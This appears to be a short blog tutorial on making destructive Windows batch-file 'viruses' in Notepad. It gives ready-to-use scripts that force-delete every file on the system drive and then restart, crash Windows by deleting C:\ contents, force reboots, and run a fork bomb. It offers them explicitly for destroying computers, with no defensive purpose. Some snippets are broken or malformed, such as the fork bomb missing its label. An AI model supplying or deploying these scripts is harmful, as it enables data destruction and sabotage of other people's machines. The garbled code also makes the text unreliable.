-->

Tricks to make Simple Virus

Learn how to make simple but powerful bat viruses to destroy computer by using easy coding in notepad.

Make Simple Virus
There are many virus which we may develop or can make easily. As we have already discussed about many Tricks to make viruses, here are some more Tricks to make simple viruses.To make these just follow the folloing given below steps :



1) Open Notepad.

2) Copy and paste any of the following codes of your choice to make virus:
  • To delete all the content of a drive, use this code :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
  • To crush the Windows, use this code :
@Echo off
Del C:\ *.* y
  • To make computer restart virus, use this code :
@echo off shutdown -r -f -t 00
  • To make Fork virus to open many Command Prompts, use this code :
start
%0
goto :s
3) Now Save these Files with any desired name with .bat extension.

4) Don't run these files on your own computer otherwise the result you already know.

So these are simple Tricks to make Simple Viruses.

You may like these posts